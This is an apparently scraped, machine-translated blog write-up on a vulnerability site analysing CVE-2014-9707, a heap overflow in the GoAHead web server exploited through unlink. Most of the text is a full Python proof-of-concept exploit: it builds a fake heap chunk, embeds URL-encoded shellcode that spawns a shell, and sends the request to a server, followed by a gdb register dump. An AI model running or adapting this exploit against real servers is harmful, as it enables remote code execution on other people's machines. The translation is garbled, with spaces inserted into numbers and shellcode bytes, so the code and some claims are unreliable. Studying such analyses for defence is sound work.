From the CVE-2 0 1 4-9 7 0 7 see the unlink exploit-vulnerability warning-the black bar safety net

2016-09-21T00:00:00
ID MYHACK58:62201679457
Type myhack58
Reporter k0shl
Modified 2016-09-21T00:00:00

Description

Foreword Recently been looking at springs, a brother of the vulnerability war: software vulnerability analysis Essentials, I contact binary the time is not long, but I think this book is particularly good, the main reason is this book in the vulnerability covers the vast majority of Common Vulnerability types, moreover, each of the vulnerability were able to restore a basic vulnerability model. Speaking of the vulnerability model, I recently came across a very interesting vulnerability, that is, I write this article the protagonist of the CVE-2 0 1 4-9 7 0 7, one Linux server software GoAHead heap overflow vulnerability in the analysis of this vulnerability, I found that this vulnerability can restore a very interesting and common basic vulnerability model, for I'm such a rookie learning Linux heap overflow exploits with a lot of help, so I summed up the whole process to share with you, and finally want to thank fneig, explorer master guide! Vulnerability analysis First of all, I posted this vulnerability PoC ``

!/ usr/bin/env python

-- coding: utf-8 --

from pwn import * def hex2url(i): array = format(i, 'X') if len(array) % 2 != 0: array = '0' + array ret = ". join('%' + array[i-2:i] for i in xrange(len(array), 0, -2)) return ret def fake(chunk_addr): print(hex(chunk_addr)) chunk = int(hex(chunk_addr)[0:8], 1 6) + 1 print(chunk) fake_fd = hex(chunk) fake_chunk_addr = int(fake_fd + '2f', 1 6) fake_bk = fake_chunk_addr - 8 return fake_chunk_addr, int(fake_fd, 1 6), fake_bk def make_fake_chunk(chunk_addr): chunk = (chunk_addr & ~0xff) + 0x12f fd = int(format(chunk, '08X')[:6], 1 6) bk = chunk return fd, bk, chunk pro = remote('localhost', 8 0) chunk = 0x8057840 fd, bk, fake_chunk = make_fake_chunk(chunk) print(hex(fd), hex(bk), hex(fake_chunk)) shellcode = '%eb%1 6%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0%9 0' shellcode += "%eb%1 9%5e%3 1%d2%8 9%5 6%0 7%5 2%5 6%8 9%e1%8 9%f3%3 1%c0%b0%0b%cd" shellcode += "%8 0% 3 1%db%3 1%c0%4 0% cd%8 0%e8%e2%ff%ff%ff%2f%6 2% 6 9" shellcode += "%6e%2f%7 3% 6 8" shellcode_addr = fake_chunk + 4 * 4 offset = 0 exp = 'GET /' exp += hex2url(fd) # fd exp += hex2url(bk) # bk exp += hex2url(0xbffff2ac - 2 0) # fd_next, stack exp += hex2url(shellcode_addr) # bk_next pad = fake_chunk - chunk - 1 6 print('pad:{0}'. format(pad))

fake chunk

exp += 'A' * (fake_chunk - chunk - 1 6) exp += hex2url(0x01020304) # prev_size exp += hex2url(0x01020304) # size exp += hex2url(chunk - 8) # fd exp += hex2url(chunk - 8) # bk exp += shellcode print('--{}'. format(1 0 2 4 - (fake_chunk - chunk) - 1 6 - len(shellcode)/3)) exp += '/./' exp += hex2url(2) * 5 0 exp += 'A' * (1 0 2 4 - (fake_chunk - chunk) - 1 6 - len(shellcode) / 3 - 5 0) exp += '/. ssss'

exp += 'A'*1 0 2 4

exp += 'HTTP/1.0\r\n\r\n' print(len(exp)) print(exp) pro. send(exp) This is a very interesting stack overflow vulnerability, the Goahead is a well-known Web server in processing incoming data packets, the data packets are for some processing, after processing with length before, there is no effective symmetry, which leads to the subsequent data packet is admitted before the application of the buffer, if a subsequent data packet length is too large, will make before a buffer overflow occurs. Before the buffer is malloc application is made, after the spill, it can be by covering some of the key pointers and variables, in the heap is released when the trigger unlink, resulting in arbitrary code execution, the following of this vulnerability for detailed analysis. First run the Goahead, and then by gdb attach pid of the attached process, the run exp, found that the program is interrupted, the hit breakpoint. gdb-peda$ c Continuing. Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0x545 ECX: 0x545 EDX: 0x6 ESI: 0x45 ('E') EDI: 0xb7eec000 - > 0x1a5da8 EBP: 0xbffff178 - > 0x805cb28 - > 0x0 ESP: 0xbfffeeb4 - > 0xbffff178 - > 0x805cb28 - > 0x0 EIP: 0xb7fdebe0 (: pop ebp) EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0xb7fdebdc : nop 0xb7fdebdd : nop 0xb7fdebde : int 0x80 => 0xb7fdebe0 : pop ebp 0xb7fdebe1 : pop edx 0xb7fdebe2 : pop ecx 0xb7fdebe3 : ret

[1] [2] [3] [4] [5] [6] [7] [8] [9] [1 0] [1 1] [1 2] [[1 3]] (<79457_13.htm>) [1 4] next